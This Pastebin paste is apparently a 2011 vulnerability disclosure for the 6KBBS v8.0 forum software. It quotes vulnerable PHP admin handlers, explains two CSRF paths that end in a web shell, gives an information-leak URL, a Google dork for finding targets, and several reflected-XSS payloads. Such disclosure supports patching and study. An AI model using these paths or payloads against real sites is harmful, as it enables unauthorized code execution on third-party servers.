Guest User

Untitled

a guest
Oct 11th, 2011
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.06 KB | None | 0 0
  1. # Exploit Title: 6kbbs Multiple Vulnerabilities
  2. # Google Dork: Powered by 6kbbs V8.0
  3. # Author: insight-labs
  4. # Software Link: http://www.6kbbs.net/
  5. # Version: 6KBBS v8.0 build 20101201
  6. # Tested on: linux+apache
  7.  
  8. 1.Cross-site request forgery (getshell)
  9.  
  10. vulnerable file: /admin/user_ajax.php
  11.  
  12. detail:
  13. case "savegroups2":
  14. try
  15. {
  16. $groups = $_POST['groups'];
  17. if(is_array($groups))
  18. {
  19. foreach($groups as $group)
  20. {
  21. $db->row_update("groups", $group, "id={$group['id']}");
  22. }
  23. }
  24. $rows = $db->row_select("groups", "", 0,
  25. "groupid,groupname,popedom,starnum", "groupid");
  26. $groups = array();
  27. foreach($rows as $row)
  28. {
  29. $groups["{$row['groupid']}"] = $row;
  30. }
  31. writeGroupsCache();
  32. succeedFlag();
  33. }
  34. catch(Exception $e)
  35. {
  36. echo($e);
  37. }
  38. break;
  39.  
  40. Update the information, by writeGroupCache () function to update the
  41. information written to \cache\groups.php them, direct access to the
  42. \cache\groups.php you can get shell.
  43.  
  44.  
  45. 2.Cross-site request forgery (getshell)
  46.  
  47. vulnerable file: /admin/portalchannel_ajax.php
  48.  
  49. detail:
  50.  
  51. case "saverule":
  52. try
  53. {
  54. $id = trim(strFilter($_POST['id']));
  55. $code = stripslashes($_POST['code']);
  56. writeFile("collectrules/{$id}.php", $code);
  57. succeedRes();
  58. }
  59. catch(Exception $e)
  60. {
  61. echo($e);
  62. }
  63. break;
  64.  
  65. Directly to the id as a php file name, code is written as the contents of
  66. the file /admin/collectrules/ folder them.
  67. And receive data at the time, did not verify Referer and Token, you can take
  68. advantage of CSRF.
  69.  
  70. 3.Information Leakage
  71. vulnerable file:/admin/portalcollect.php
  72. /getfiles.php?f=http://xxx&t=js
  73.  
  74.  
  75. 4.Cross Site Scripting Vulnerabilities
  76.  
  77. detail: many file directly use $_SERVER['PHP_SELF'] and not sanitize so
  78. cause xss Vulnerabilities
  79.  
  80. credits.php/"><script>alert(1)</script>
  81. forum.php/"><script>alert(1)</script>
  82. index.php/"><script>alert(1)</script>
  83. login.php/"><script>alert(1)</script>
  84. online.php/"><script>alert(1)</script>
  85.  
  86.  
  87. # [2011-10-10]
  88.  
Advertisement
Add Comment
Please, Sign In to add comment